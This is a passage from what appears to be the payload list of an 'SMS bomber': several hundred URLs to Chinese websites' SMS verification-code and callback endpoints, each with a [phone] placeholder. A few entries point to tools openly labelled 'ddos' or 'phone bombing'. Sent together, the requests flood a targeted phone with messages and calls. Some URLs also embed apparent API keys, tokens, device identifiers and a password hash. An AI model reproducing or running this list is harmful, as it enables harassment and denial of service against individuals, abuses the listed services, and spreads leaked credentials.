"https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]", + "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", + "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", + "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=+86&validateType=1", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]", + "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", + "http://www.sk-vip.cn/index.php?m=&c=page&a=yunhu&phone=[phone]", + "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]", + "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", + "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", + "http://renjie.houhan.com/api/Register/send_sms?mobile=[phone]&host=renjie.houhan.com", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", + "http://xiangpai.jishiyuanwl.cn/api/public/?service=Login.GetCode0&mobile=[phone]&sign=2019&type=0", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://m.egou.com/validate_phone.htm?phone=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://jdapi.jd100.com:443/uc/v1/getSMSCode?account=[phone]", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]", + "http://gj.liansuosoft.com/ShopRegister/VCode?rand=0.3306040567511852&code=[phone]", + "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://www.suicunsuiqu.com/front/account/verifyMobileReg?mobile=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]", + "http://www.ehuu.com/apiv4/clientApicheckPhone?phoneNum=[phone]", + "http://account.ilongyuan.com.cn/index.php?s=/home/user/verify.html&random=0.8012450194754068&client_id=&verify=[phone]", + "http://www.7881.com/img_valid.jsp?param=1557302312619&t=0&phone=act=reg&captcha=[phone]", + "http://xq.ibaihe.com/register/captcha?phone=[phone]", + "http://www.xd.com/users/sendWebRegCode?callback=jQuery110208424835141365408_1600270044866&mobile=[phone]", + "http://www.hotouzi.com/register/register_sms.html?telephone=[phone]&token=", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=\u9f50\u6668&fromurls=http://www.mianfeidianhua.net/hsnzy.html&content=\u60f3\u54a8\u8be2\u3002&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "https://ddt.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", + "http://my.ikang.com/loginUserReg/getGenerateCode?phone=[phone]", + "http://www.gghzj.cc/dx/dx/mini/index.php?hm=[phone]", + "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", + "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", + "http://www.baixing.com/oz/verify/reg?mobile=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "http://shop.shtv.net.cn/ShopWeb/Ajax/ChkSMSCode.ashx?t=0.016637186912638713&MobileCode=&type=user-registerphoneNo=[phone]", + "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo= [phone]", + "https://mobilegt.weidai.com.cn/api/v2/verify/mobile/[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]", + "http://zha.vvoso.com/?zha=[phone]&x=10", + "http://e.weisns.com.cn/Jsonp/send_mobile_code_reg?callback=jQuery17208124790173017422_1582106551645&mobile=[phone]&token=00-cef055211be84b54a91287fc906bb0d90401bficbagfjjnore2etrosopaqp2rwsslaglw-09fe1fe580b4879abdbabd7ca1f5e26c-5dee0acfe62d2b442088c156&_=1582106605205", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://bj.yqbiao.com/UserInfoArea/Users/GetSmsCodeForReg?tel=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "https://graph.3vjia.com/captcha/mobile/reg/[phone]?moblieImgCaptcha=", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://www.wenbita.net/plugin.php?id=wq_smslogin&mod=sendcode&handlekey=bind&loginsubmit=yes&module=register&phone=[phone]", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=http://s.juntu.com/member/index/getLoginCode?mobile=[phone]", + "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", + "http://www.eyprint.com/include/getcode.php?telnum=[phone]", + "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", + "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=AppStore&ip=192.168.43.151&mobile=[phone]", + "http://lndx.edu.cn/Third/Mobile_SMS?Mobile=[phone]&beCallPhone=15810904000", + "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", + "https://edu.10086.cn/sso/sendSmsMsg&do=get_vcode&user_mobile=[phone]", + "https://www.tuiyizx.com/v2/cellphone/?m=get&cellphone=%2B86%20[phone]&action=check", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", + "http://www.ezhe.com/api/verifyCode?phone=[phone]&type=2&smsType=1", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://hezi.ainide.cn/hzq/lt213.php?hm=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303640777548241676_1579193274318&phone=[phone]", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "https://u.house.ifeng.com/getVerifyCode?_=0.38838852170651417&_t=1565612980&verifyCode=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&ararea=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://www5.rayvision.com/yxzCode!send.action?type=2&toPhone=[phone]", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", + "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", + "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", + "https://app-api.shop.ele.me/arena/invoke/?method=OpenAPIRegisterService.sendVerifyCode&site_id=gw_Cloudgame&geetest_challenge=&geetest_validate=&geetest_seccode=&reportData=number=[phone]", + "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8,1&device_name=iPhone 6s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://reg.lenovo.com.cn/captcha/canSend?mobile=[phone]&callback=getMobileCode&_=1480296216538", + "http://open.zhundao.com.cn/api/v2/senCode?&phoneOrEmail=[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", + "api.php?hm=[phone]", + "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=&agent=[phone]&_=1500773935216", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "http://www.faka866.com/index/checkuser?Mobile=[phone]&act=sj_reg_telma&t=1589617288409", + "https://user.chinahr.com/cppt/open/msg/send/smsCode?mobile=[phone]&isVisitor=isVisitor", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://app.bczp.cn/pk/GetCode.ashx?mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]", + "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "http://ndapi.nexttao.com/api/user/request_mobile_code?mobile=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://www25c1.53kf.com/impl/rpc_callback_phone.php?from=api&company_id=72204003&guest_id=11199824994006&style=1&from_page=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3D3RHZQYd7M-TF4MUvr7tQD4xVSYxHv_IWj2SbNAAdoKtf_Xk51H_avXcuoOtSQIe96CW0u5SYUWmlZJPnQXRVka%26wd%3D%26eqid%3D9f6d04a1000e3ecf000000065fb824c2&talk_page=http%3A%2F%2Fwww.yueshi-edu.com%2Fvxueli%2Fsz%2F5762.html&land_page=http%253A%252F%252Fwww.yueshi-edu.com%252Fvxueli%252Fsz%252F5762.html&call=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.dye-ol.com/code/ValidCode.aspx?r=0.503437238889475&Code=3&UserID=0Mobile=[phone]", + "https://khweb.easec.com.cn:12203/nImgServlet?key=0.17275703431645484&funcNo=501520&op_source=3&flow_type=twvideo&ip=&mac=&verify_code=mobile_no=[phone]", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjiyephkstunetjbbx&phone=[phone]", + "http://www.atmyjr.com/user/ashx/ajax.ashx?action=telyuyin&mid=17433&v=1439377001052&txtMobile=[phone]", + "http://www.lawyersuperman.com/checkCellphone?cellphone=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi4A&osLevel=23&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]", + "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone]", + "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://walk-prod.bohanyuedong.com/api/message/sendV2?phone=[phone]&app_id=2&timestamp=1599549118&channel_id=000&device_id=F9D6949590A78676215E2CD28D7539342F42B1A8&os=25&version=1.0.1&sign=af2b1f5cd686f61176655c7528819b26&imei=861271047037119&imei_device_id=94086F8106D8651CDC5B90160F11B56BD0AECC00", + "http://www.qmxgz.cn/api/Sms/send?phone=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", + "http://meeting.csco.org.cn/Admin/VerificationCode/?type=1&v=1&id=1&email=&checkcode=ipass=0&mobile=[phone]", + "https://open.zhundao.net/api/v2/senCode?&phoneOrEmail=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", + "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", + "http://www.sxyj.net/WebApi/Phone/SendPhone?phone=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://www.team520.com/ddos/index.php?hm=[phone]", + "http://qqz.xiaojiangwl.com/?yChgSnXh=[phone]", + "http://www.chatm.com/userInfo/smsCode?mobilephone=[phone]", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]", + "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", + "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", + "http://u.panda.tv/ajax_send_sms?_jp=jQuery112408335659883577431_1478711837703&regionId=86&mobile=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "https://www.sxcfu.com/user/verifyPhone?phone=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE@5.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://sso.toutiao.com/send_activation_code/?mobile=[phone]", + "https://webapi.account.mihayo.com/Api/create_mobile_captcha&gameId=[phone]", + "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", + "https://m.zhaopin.com/api/capi?capiUrl=passport/getSmsCodeSecurity&mobile=[phone]", + "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://www.id68.cn/member/common/ckuser/ m=mobile&a=isMobile&format=ajax&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "https://cloud.nucarf.com/rest/querySmsCode?phoneNum=[phone]", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", + "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", + "http://www.youxia.cn/go/index.php?mod=account&code=getRandCode&pic_code=undefined&phone=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "http://jz.gymchina.com/api/user/getVerificationCode.json?phone=[phone]&platform=and&sid=43d54311742a6c62a11ef8b64d8c7ac1&brand=OPPO&version=2.2.6&appName=tomato&partner=xiaomi&model=PCRT00", + "http://www.edu-edu.com/cas/web/message/send?phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]", + "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", 